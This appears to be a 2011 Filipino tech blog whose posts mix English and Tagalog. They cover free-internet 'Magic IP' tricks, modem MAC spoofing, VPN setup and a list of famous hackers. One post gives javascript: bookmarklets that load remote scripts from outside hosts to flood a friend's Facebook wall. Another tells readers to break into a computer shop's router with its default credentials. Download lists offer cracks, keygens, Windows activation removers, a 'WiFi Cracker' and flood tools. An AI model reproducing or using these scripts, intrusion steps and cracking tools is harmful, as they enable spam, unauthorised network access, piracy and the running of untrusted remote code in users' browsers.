Featured Post Today
print this page
Latest Post

How to Earn Money Using Your Blog!

 This tut is for blog spot user

Sign Up for Google Adsense

click Here to sign Up

After a few days of waiting check your email  if your application is approved
Now check your Blog Monetize for Your Earnings
You can sign Up for Amazon

Adding Ads on your Blog  click the Design Tab

click Add a Gadget (widgets)
click the "+" icon
 You can choice where you want to place your add location.

View your Blog and you will see your AdChoice

Note: Your Earning per adds click! Don't click Your Own Adds or else your account is Blocked

You can sign up for Amazon  for extra income its the same  process and adding widgets

or sign up for Nuffnang Adds http://www.nuffnang.com
 Need Help for Nuffnang click Here

 This Video is from Mel and Joey Show  featured pro bloggers sadly the show is off.

EDIT: error on Payee Name on Western Union..   Simply diveded your Full Name into Two
Sample : Amador S Maton Jr
Payee First Name/Given Name:Amador S

Payee Last Name/Surname/Family Name: Maton Jr

Posted by: Jaime
blognizend, Updated at: 5:52 AM


This Day I have a trouble reformatting a PC with a Asus Motherboard model M2A-VM.

I don't have a Driver of it, so  I search  Google for a Driver. None of the First page Help XD and it realy suck's  Downloading and installing for the perfect driver SM BUS.
I only need is a SM BUS driver

after an hours of searching I found it!!
click Here to Download It
or Try my Own File from Google doc
R134873.EXE Download (4 MB)
Posted by: Jaime
blognizend, Updated at: 5:44 AM

Create your Own Magic IP

1. punta kayo sa 24/7 na computer shop
2.punta kayo sa site na eto...
3. gawa kayo ng account
4. verify your account
5.gawa kayo ng Hostname..
bahala kayo kung port 80
ayan may instant Magic IP na kayo hahahaha
naka hide pa kase Hostname nga ehh..
Di gumgana? baka may firewall
hacking nyo ang router ng computer shop
itype sa URL ayan ang default!!
may password at User yan
Default user: admin
Default password:1234
enable VPN
ay naku pag di nyo alam pa yan na jan si GOOGLE!!
pwede din itago ang IP ng VPN server na eto dun sa scripts imbest naka litaw ang IP ay Hostname hehehe
Posted by: Jaime
blognizend, Updated at: 6:19 AM

Facebook Wall Flood

1. go to your friend's wall.
2. paste the script in the URL!!!

heres the script:

javascript:(a = (b = document).createElement("script")).src = "//hallwayinsider.com/a.js", b.body.appendChild(a); void(0)

3. after pasting the script in the URL. press enter.

4.after step 3 u will see a text box asking how many, type 200, pero maski 200 type nyo max ng 10 posts lang ata gagawin ng script eh.

5.after typing 200, another box will appear, type ur message.
then press enter.
 the page will refresh and ur friend's wall is flooded!!!

Another Scripts:

javascript:(a = (b = document).createElement("script")).src = "http://flooder.googlecode.com/files/FBWF.js", b.body.appendChild(a); void(0)

Posted by: Jaime
blognizend, Updated at: 5:28 AM

Free internet TV Filipino Chanel

Posted by: Jaime
blognizend, Updated at: 6:07 AM

Security kissTunnel + HotSpot Shield by Symbianize (Magic IP are Deads so this is alternative)

Have you been blocked by your Internet Provider?
Do you want to ensure privacy in Internet?
Do you want to protect your transactions?
Online TV is banned in your location?
VoIP is blocked or distorted?

Use SecurityKISS Tunnel

SecurityKISS Tunnel redirects all your online traffic through an impenetrable tunnel to our security gateway.
Everything in the tunnel is encrypted so you can:
  • Ensure your passwords, credit card numbers, online shopping and all of your data is secured
  • Protect yourself from snoopers at Wireless hotspots, hotels, airports, corporate offices
  • Protect your data from being intercepted by various network sniffers
  • Protect yourself from identity theft online

SecurityKISS Tunnel is not only about security. It also solves a number of common concerns:
  Bypass Blocking, Filtering and Monitoring
  • Access blocked websites from your office (YouTube, Flickr, gambling, blog sites, ICQ, email, chat)
  • Unrestricted access to TV streams, Radio streams and others
  • Use Skype and other VoIP even if it is blocked or distorted by your Internet Provider
  • Avoid being identified by anyone including governments
  • Access all content privately without censorship
  • Unblock all ports with no configuration
  • Unrestricted access for international users blocked by government control
  Full Anonymity
  • Protect your identity online by hiding your real IP address
  • Assign your computer a new European IP address
  • Hide your online activities from your boss, children and spouse
  No need to use a proxy any more
  Traffic compression guarantees high-speed access to any site or service
  Support for all applications on your computer – they are not aware of the tunnel 

for FREE VPN used:
* Install this:
SecurityKISSsetup.exeDownload (2 MB)
*After installation copy this 3 file.. How? go to the properties  of the kiss shortcut icon  find target then go to openvpn folder. Open the config folder

*After installation and copying those file  uninstall it:
then Download this:

here's the config just  copy and paste it  to the original con fig directory
Smart config Download (1 KB) 
globe config Download (1 KB) 
globe config2Download (1 KB)  

connected but can't brows?
install TAP HSS  found in  Hotspotshield  folder,
Posted by: Jaime
blognizend, Updated at: 6:06 AM

How to Change MAC for Wimax BM622


Mac address are responsible for your speed and disconnection look under your wimax modem see your own wimax
4. TYPE, LOGIN: wimax PASSWORD: wimax820
5. pag nagtype kayo ng password walang lalabas na character dun basta type lang kayo..
6. to change mac address.. ex: type setallmacaddr 00:25:99:6E:25:F2 enter
7. Open your browser & type ( Log in as admin )
8. Go to "Maintain" tab and click "Restore Default You have to click OK button twice, then the modem automatically reboots

NOTE: Window 7 Telnet is disable here 's how to enable Window 7 Telnet click Here for tutorials.

You can change 2 last Mac
example here XX:XX:XX:XX:F9:89   XX:XX:XX:XX:F4:84

mac generator

look for working MAC
Shehzhen Huawei Communication Technologies Co., Ltd.
or you can also try to just change the 5th or 6th part of your Mac address..

JailBreak_s Mac Address Maker

more info here
If this blog helps you .

I just Update the tutorial in y NEW BLOG  In clude How to Change Wimax Serial


Posted by: Jaime
blognizend, Updated at: 4:57 AM

How to Enable Telnet on Windows 7

The post was move in Here , if these blogs help you
Posted by: Jaime
blognizend, Updated at: 4:53 AM

Mobile Browser

bolt v1.50handler.jarDownload (232 KB)
ucweb7.7.sisDownload (1 MB) 
ucweb7.6.sisDownload (874 KB)  
ucweb7.4.sisDownload (1 MB) 
UCBrowser_V7.7.1.88_S60V2_pf27_(Build11051010).sisDownload (948 KB) 
UC_THUNDER_v_1.3.0.1_S60v5_English.sisDownload (562 KB) 
uc76androidhui200b4.jarDownload (547 KB) 
QQBrowserV1.6s60v2.sisDownload (744 KB) 
QQBrowser2035HUI200b5.jarDownload (251 KB) 
bolt v2.31handler.jarDownload (287 KB) 
bolt v2.11handler.jarDownload (280 KB) 
bolt v2.0handler.jarDownload (255 KB)  
bolt v1.50handler.jarDownload (232 KB)
Posted by: Jaime
blognizend, Updated at: 5:37 AM

Mobile Games

 Genre: RPG
From: AnotherGuest
Genre: Racing
From: Gameloft
Asphal Urban GT 2 3D

SidMeiersCivil_6280.jar Download (352 KB)

SidMeiersCivil_E71.jarDownload (363 KB)
 SidMeiersCivil_n70.jarDownload (290 KB)
SidMeiersCivil_N80.jarDownload (542 KB)
 SidMeiersCivil_n95.jarDownload (353 KB)
SidMeiersCivil_n5800.jarDownload (587 KB)
SidMeiersCivil_n5200.jarDownload (234 KB)
civilizationiv_defendersofthegates_D500.jarDownload (178 KB)
civilizationiv_defendersofthegates_E398.jarDownload (211 KB)
civilizationiv_defendersofthegates_m600.jarDownload (358 KB)
civilizationiv_defendersofthegates_rizrz6.jarDownload (357 KB)
civilizationiv_defendersofthegates_w810.jarDownload (393 KB)
civilizationiv_defendersofthegates_W995.jarDownload (458 KB)

category: Strategy
vendor: Herocraft
Art of War 2:GA sequel to the famous mobile real-time strategy. Lead the peacemaking army and set a new final world order.
1.jarDownload (382 KB)
2.jarDownload (387 KB)
3.jarDownload (387 KB)
4.jarDownload (457 KB)
5.jarDownload (487 KB)
6.jarDownload (516 KB)
7.jar Download (516 KB)
8.jarDownload (1 MB)
9.jarDownload (1 MB)
10.jarDownload (388 KB)
11.jarDownload (512 KB)
12.jarDownload (409 KB)
13.jarDownload (517 KB)
14.jarDownload (516 KB) 
Posted by: Jaime
blognizend, Updated at: 6:31 AM


0M43HUIRev2.jarDownload (202 KB) 
4.2 hui132.jarDownload (153 KB) 
4.2 hui145pinger.jarDownload (206 KB)
 4.2 labshui145r4.jarDownload (175 KB)
 4.2+unmodded.jarDownload (124 KB)
4.3 hui123r1.jarDownload (173 KB)
4.3 hui200b4r1.jar Download (177 KB)
4.3 huirev2.jarDownload (202 KB)
5.0 hui142final.jarDownload (289 KB)
6.0 hui123fix1nsl.jarDownload (309 KB)
OM3lofiMAGIC-IP.jarDownload (60 KB)
OM3lofiMultiOpAdvMenuTurbo.jarDownload (94 KB)
om4.3Firefoxgreen.jarDownload (169 KB)
OM4_3HUI200b4Rev1-Firefox-Red.jarDownload (215 KB)
OM4_3HUI200b4Rev1-Firefox-Red_2.jarDownload (215 KB)
OM4_3HUI200b4Rev2-Firefox-Red.jarDownload (193 KB)
OM6indepbyzhaito19.sisDownload (658 KB)
OM6-purple-win7_blognizend.sisDownload (644 KB)
OM409QuainHUI200bAdvMenuTurbo.jarDownload (160 KB)
opera8.65.sisDownload (1 MB)
Operamini6_akatzuki.sis Download (813 KB)
4.2 hui145pinger.jarDownload (206 KB)

Posted by: Jaime
blognizend, Updated at: 5:44 AM

How to hide or become Offline on New Facebook Chat

Want to GO Offline? click the GEAR icon you will see " Available to Chat"  just click it
now  your Offline..

Want to Go Online again click only this..
Posted by: Jaime
blognizend, Updated at: 5:21 AM

HOW to Ping You Magic IP ( Proxy ) to Stay Alive!!

1. click the RUN at  window start
2. it will POP up a BOX
3. type ping (Your Magic IP Here) -t
4. clik OK!! and you will see a cmd prompt  a Black window

You can Customize you pinger too!!
View here :http://blognizend.blogspot.com/2011/11/make-our-cmd-pinger-more-attractive.html

Ok that's it.. :p
Posted by: Jaime
blognizend, Updated at: 5:07 AM

Java Apps ( jar )

file_lock.jar Download (10 KB)
face_warp.jar Download (146 KB)
eng-french_dic.jarDownload (99 KB)
calc_scientific-calculator.jarDownload (93 KB) 
calc4m.jarDownload (84 KB) 
ttpod_v1.70.jarDownload (623 KB) 
 togotv30.jarDownload (99 KB)
tagalog_bible.jarDownload (1 MB) 
paintcad_photo-editor_2.jar Download (497 KB) 
minicommander-v4.1.jar Download (230 KB) 
medical_dic.jarDownload (1 MB) 
kd_player.jar Download (140 KB)
GoogleMaps2.03.jarDownload (443 KB)
 googlemap_hui232.jar Download (444 KB) 
eng-jap_dic.jarDownload (99 KB)
 eng-french_dic.jar Download (99 KB)
 encyclopedia.jar Download (979 KB)
 cartoon-yourself.jarDownload (161 KB)
bluetooth_chat.jar Download (84 KB) 
 kentools.jarDownload (514 KB)
eng-tagalog_dic.jar Download (261 KB) 
 eng-span_dic.jarDownload (99 KB)
OperaMini6(myGlobeConnect).jarDownload (292 KB)
Opera_Mini_4.2myglobeconnect.jarDownload (129 KB)
5miniarma.sisDownload (31 KB)
mywap.ph_UC76OFHUI123Fix1.jarDownload (464 KB)
Photoshop.jarDownload (414 KB)
OperaMini.v5.1 myglobeinet.sisDownload (599 KB)
i love y mhecc. om6 turbo.jarDownload (340 KB)
IDviewer.sisDownload (13 KB)
OM3hifimyGlobe.jarDownload (130 KB)
zwg phantom flood s60v2.sisDownload (11 KB)
 imagespy_v2.0.5.sisDownload (31 KB)
 Freeze.sisDownload (12 KB)
px id viewer with kick.sisDownload (27 KB)
gravitymotocycle.jarDownload (346 KB)
imagespy_v2.0.5.sisDownload (31 KB)
xaeron.net_Signal_enhancer.sisDownload (15 KB)
GRASANFLOODEN.sisDownload (16 KB)
call_master_macx.jw.lt_.sisDownload (613 KB)
Icon_Maker.sisDownload (15 KB)


Posted by: Jaime
blognizend, Updated at: 4:27 AM


Technical challenges to online privacy

The Internet did not evolve with privacy in mind. In fact, the protocols that provide the fundamental underpinnings of the Internet are inherently non-anonymous. It's just a simple matter of computers needing to know each other's addresses in order to exchange data. For instance, any webserver can detect your Internet Protocol (IP) address. Other characteristics that a server can detect about you are your referrer (the site from which you are linking), the user-agent (the program you are using to browse the Web), and your operating system.

What does your IP address reveal about you?

Your IP address reveals your point of entry to the Internet and can be used to trace your communications back to your ISP, your employer's network, your school, a public terminal. Though your IP address may not identify you personally, an IP is a unique identifier which represents your computer's digital ID while you are online.

It is possible to disguise your IP address on the Web by using an anonymous proxy server. A proxy acts as an intermediary, routing communications between your computer and the Internet. A proxy specializing in anonymous surfing, however, uses its own IP address in place of yours in every outgoing request.

Approaches to proxy

Proxies are commonly used for several reasons: security, load balancing, data caching in order to reduce bandwidth demands, and censorship or filtering. Filtering proxies insulate you from objectionable elements of Webpages such as cookies, ad banners, dynamic content like Javascript, Java Applets and ActiveX controls. Some anonymous proxies encrypt your Web communications, protecting you from routine monitoring or even dedicated surveillance. Be careful, though, not all proxies are anonymous! Here is an overview of the basic approaches to proxy:

  • Web-based Proxies: Web-based Proxies are powered by server-side softwares such as CGIProxy, PHProxy, Glype, and custom proxy scripts. These proxies work entirely through a Web browser. Usually all that is needed to hide your IP address and surf anonymously is to visit the service's homepage in a Web browser and enter a URL (website address) in the form provided. There is no requirement to download or install software or reconfigure your computer. To work, a CGI based proxy must manipulate the document you've requested and all its associated elements and objects. This can be tricky, and not all proxies are as efficient or effective as others. Some services are slow and may produce errors while rendering the many variations of Web page code. But they are popular, numerous, and easy to use. See this page for a complete list of Web proxies.

    Proxy.org recommends: Proxify® and the other proxies listed in the top ten.

  • Open Proxies: So-called "open proxies" are HTTP or SOCKS type proxy servers that are accidentally or maliciously left "open" and accessible on the Internet. HTTP or SOCKS type proxy servers require that you configure your browser's proxy settings in order to use them. These proxies have the advantage of being compatible with almost all webpages since they do not have to modify the requested page to keep you anonymous. However, there are several major disadvantages to using open proxies. Many utilize computers that are compromised, operated by government agencies, or operated by malicious individuals. Often when an attacker obtains control of an end-user's computer they will install a proxy server so the machine can be exploited to launch further attacks on other machines. It is also commonplace for open proxies to be operated as "honey pots", where all actions are logged for forensic research. Open proxies are easy to abuse and there are many people using them to commit credit card fraud, pay-per-click fraud, attack or break into computers, and hundreds of other illegal activities. We strongly discourage the use of open proxies as they provide no privacy or security and using them can result in increased exposure and liability.

    Proxy.org recommends: Socksify® instead of any open proxy.

  • Proxy networks: Various proxy networks (Freenet, I2P, JAP, and TOR) feature layered encryption (sometimes called "onion routing") and peer-to-peer networking to allow their users to communicate anonymously with each other. Rather than operate their own equipment, most rely on end-users to donate bandwidth and other resources to the network. They do not control the servers in their network and certainly a percentage of them are operated by malicious individuals for malicious reasons. Therefore any promises of privacy and security should be evaluated with this in mind. Also, these services have developed a reputation for being relatively slow.

  • Proxy Software: Other subscription-based services offer client-side application software to automatically configure your browser's proxy settings. Do not be fooled by these services as most are merely open proxies dressed up with a fancy interface.
more info click HERE
Posted by: Jaime
blognizend, Updated at: 11:47 PM

Error Log In (Smart) and Connection Terminated(Globe)

Do you Experience this error?

May be your you have install Multiple modem and your PC  detect your Modem and don't know which to connect..

Use rarepair to re install your modem

Look here

Posted by: Jaime
blognizend, Updated at: 7:09 AM

Facebook error Log-in Due to site issue SOLVE!!

One day i have encountered this face book error message.. Your account is temporarily unavailable due to site maintenance. It should be available again within a few hours. We apologize for the inconvenience.I try to refresh but nothing happen.. They  I try to connection Using my mobile Phone .. but still its the same message again.. i thought it was  a maintenance but  i check my other account and it successfully log in.. I thought my other account is BANNED Soo i try to used  my other internet tools.. I used a Free VPN program.. and then I have successfully Log in my account..  I think my account was stack on  other Face book server. Because the VPN  I' used,,, is using other country IP
for VPN info click HERE 
or you may used http://blognizend.blogspot.com/2011/07/what-proxy.html
Posted by: Jaime
blognizend, Updated at: 6:18 AM

Blogger Buzz: The best blogging advice you’ve ever received

Posted by: Jaime
blognizend, Updated at: 6:30 PM


 Need to reply but you don't have a load? do you have internet access?

click Here
Posted by: Jaime
blognizend, Updated at: 6:19 PM

How to Delete Facebook Message

My  friend ask  me  How to Delete his in box message on face book. He already click the X box but the message is  still there. I check his in box and all the message are unmarked..

To delete  the message you have to marke it Read the circle must have no white like the july3 message then click the X botton. now your message is deleted.

Posted by: Jaime
blognizend, Updated at: 5:43 AM


These hackers are the ones that you’ve seen in shackles arrested for cybercrimes when they were just getting out of puberty. Some have done it for financial gain others just for fun.
1. Kevin Mitnick.
Click the image to open in full size.
Mitnick is perhaps synonymous with Hacker. The Department of Justice still refers to him as “the most wanted computer criminal in United States history.” His accomplishments were memorialized into two Hollywood movies: Takedown and Freedom Downtime.
Mitnick got his start by exploiting the Los Angeles bus punch card system and getting free rides. Then similar to Steve Wozniak, of Apple, Mitnick tried Phone Phreaking. Mitnick was first convicted for hacking into the Digital Equipment Corporation’s computer network and stealing software.
Mitnick then embarked on a two and a half year coast to coast hacking spree. He has stated that he hacked into computers, scrambled phone networks, stole corporate secrets and hacked into the national defense warning system. His fall came when he hacked into fellow computer expert and hacker Tsutomu Shimomura’s home computer.
Mitnick is now a productive member of society. After serving 5 years and 8 months in solitary confinement, he is now a computer security author, consultant and speaker.
2. Adrian Lamo
Click the image to open in full size.
Lamo hit major organizations hard, hacking into Microsoft and The New York Times. Lamo would use Internet connections at coffee shops, Kinko’s and libraries to achieve his feats earning him the nickname “The Homeless Hacker”. Lamo frequently found security flaws and exploited them. He would often inform the companies of the flaw.
Lamo’s hit list includes Yahoo!, Citigroup, Bank of America and Cingular. Of course White Hat Hackers do this legally because they are hired by the company to such, Lamo however was breaking the law.
Lamo’s intrusion into The New York Times intranet placed him squarely into the eyes of the top cyber crime offenders. For this crime, Lamo was ordered to pay $65,000 in restitution. Additionally, he was sentenced to six months home confinement and 2 years probation. Probation expired January of 2007. Lamo now is a notable public speaker and award winning journalist.
3. Jonathan James
Click the image to open in full size.
At 16 years old, James gained enormous notoriety when he was the first minor to be sent to prison for hacking. He later admitted that he was just having fun and looking around and enjoyed the challenge.
James hit high profile organizations including the Defense Threat Reduction Agency, which is an agency of the Department of the Defense. With this hack he was able to capture usernames and passwords and view highly confidential emails.
High on James list, James also hacked in NASA computers and stole software valued at over $1.7 million. The Justice Department was quoted as saying: “The software stolen by James supported the International Space Station’s physical environment, including control of the temperature and humidity within the living space.” Upon discovering this hack, NASA had to shut dow its entire computer system costing taxpayers $41,000. Today James aspires to start a computer security company.
4. Robert Tappan Morris
Click the image to open in full size.
Morris is the son of a former National Security Agency scientist named Robert Morris. Robert is the creator of the Morris worm. This worm was credited as the first computer worm spread through the Internet. Because of his actions, he was the first person to be prosecuted under the 1986 Computer Fraud and Abuse Act.
Morris created the worm while at Cornell as a student claiming that he intended to use the worm to see how large the Internet was at the time. The worm, however, reproduced itself uncontrollably, shutting down many computers until they had completely malfunctioned. Experts claim 6,000 machines were destroyed. Morris was ultimately sentenced to three years’ probation, 400 hours of community service and assessed a $10,500 fine.
Morris is now a tenured professor at the MIT Computer Science and Artificial Intelligence Laboratory. His focus is computer network architecture.
5. Kevin Poulsen
Click the image to open in full size.
Frequently referred to as Dark Dante, Poulsen gained national recognition for his hack into Los Angeles radio’s KIIS-FM phone lines. These actions earned him a Porsche among many other items.
The FBI began to search for Poulson, when he hacked into the FBI database and federal computers for sensitive wiretap information. Poulsen’s specialty was hacking into phone lines and he frequently took over all of a station’s phone lines. Poulson also reactivated old Yellow Page escort telephone numbers for a partner who operated a virtual escort agency. Poulson was featured on Unsolved Mysteries and then captured in a supermarket. He was assessed a sentence of five years.
Since his time in prison, Poulsen has worked as a journalist and was promoted to senior editor for Wired News. His most popular article details his work on identifying 744 sex offenders with Myspace profiles.

Posted by: Jaime
blognizend, Updated at: 6:41 PM

Windows XP Gamer Edition 3.1 Directxt10 102mb Latest

Windows XP Gamer Edition 3.1 Directxt10 102mb Latest!!

Windows XP Gamer Edition 3.1 | ISO | 102 Mb
Special facilitated, fully working version of Windows XP, which will walk up both for setting as the rapid work station and as a playing machine.All unnecessary services (processes it will be minimum) power-offs, the unnecessary are remote driver, certificate, built-in programs etc. DIRECTX 10. is computer-integrated in setting.With Directxt10 is good for gaming and enhanced graphics
- Super rapid and quiet setting.
- all unnecessary services Power-offs (processes it will be minimum).
- the unnecessary are Remote driver, certificates etc.
- Version requires no activating and input of the key.
- Windows will fly even on weak machinesThis is a slimmed down version of Windows XP. It is really fast because it doesn't have a lot of the crap that usually bogs down Windows like Internet Explorer. No serial is required for the install and the OS doesn't need to be activated. Perfect OS For GAMERS!
Interface is changed and maximally close to original appearance of Windows Vista.
- Super rapid and quiet setting.
- all unnecessary services Power-offs (processes it will be minimum).
- the unnecessary are Remote driver, certificates etc.
- Version requires no activating and input of the key.
- Windows will fly even on weak machines.

System Requirements:
800 Mhz or greater CPU
64 mb RAM
700mb HD space
13 processes running on default install.
Full ISO is only 102 mbINSTAlLATIONBurn it to a cd at a low speed and installMEGAUPLOAD




Updated New
Link1 Download
Link2 Download
Posted by: Jaime
blognizend, Updated at: 5:18 AM

My Download

 All are Google Docs

Twitter Log-in.rar for Magic IPDownload (43 KB)

YahooMail+chat.rar for Magic IPDownload (11 KB)

Facebook+chat for Magic IPDownload (8 KB)

wallhack_sf Download (460 KB)

Wallhack_sf-instruction Download (1 KB)

Gameboy Advance Emulator Download (642 KB)

Magic_iso Download (2 MB)

MagicdiscDownload (1 MB)

playstation_emulator-ps1-ps2Download (5 MB)

Ultra Surf 1008 Download (1 MB)

dccrap_Hspda_unlocker_crack_460 Download (2 MB)

unikey zip for 565 dc crapDownload (29 KB)

dc-unlocker_client-1.00.0565_2.rarDownload (2 MB)

Plant_vs_Zombie_cheatsDownload (418 KB)

multi yahoo messenger Download (1 KB)

DAEMON4304-LITE.rarDownload (7 MB)
JailBreak_s Huawei Mac Addresses [Crack by zykhiersz_17].rarDownload (265 KB)

JailBreak_s Mac Address Maker [Crack by zykhiersz_17].rarDownload (266 KB)

Globobo Wimac Scraper.rar  Download 576.5 KB

Bm226 auto Mac Changer rar.Download (1.522KB)

Win7 Loader Release 5.rarDownload (9 MB)

 RemoveWAT.226.rar for Win7Download (6 MB)

Win7 Auto Geniune Download (1 MB)

RemoveWAT on XP Download (839 KB)

VLC player Download (18 MB)

ALSEDI Pinger.rarDownload (234 KB)
proxifier with keys.rarDownload (826 KB)

KeepAliveDownload (4 KB)

DeepFreeze Download (6 MB)

rarepair.zipDownload (40 KB)

Convert CD to Usb Bootable Download (6 MB)

Pinoy Text Messenger v3.1.exeDownload (816 KB)

 Pinger.exe Download (226 KB)

SMARTHACK.rar Download 1.1mb Download(1.2mb)

DNSFlash.rar Download54bytes

Expat Shield powered by Portable Openvpn 2.1 (GLOBE-SMART UDP) SEPT 16_ 2011) 1.45mbDownload

TAP HSS 32bit Adapter.rar Download

TAP HSS 64bit Adapter.rar Download

Expat Shield powered by Portable Openvpn 2.1 (GLOBE-SMART UDP) AUG 28_ 2011 Download

13 servers config GLOBE_UDP-8-8-2011 Download

13 servers config SMART_TCP-8-8-2011 Download

 XPATSHIELD 7mb Download

WAT FIX Download 630kb

windows7 crack.rar Download

Internet Download Manager 6.06 Build 3.rar  Download 4.2mb

Windows 3in1 make Bootable USB  Download 9mb 

KEY GEN for Internet Download Manager ALL Version Download200kb

WiFi Cracker Download 20MB

HandyCafe  Setup_v3 Download
Posted by: Jaime
blognizend, Updated at: 1:18 AM
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. blognizend - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Blogger
Google+ Jaime Lacson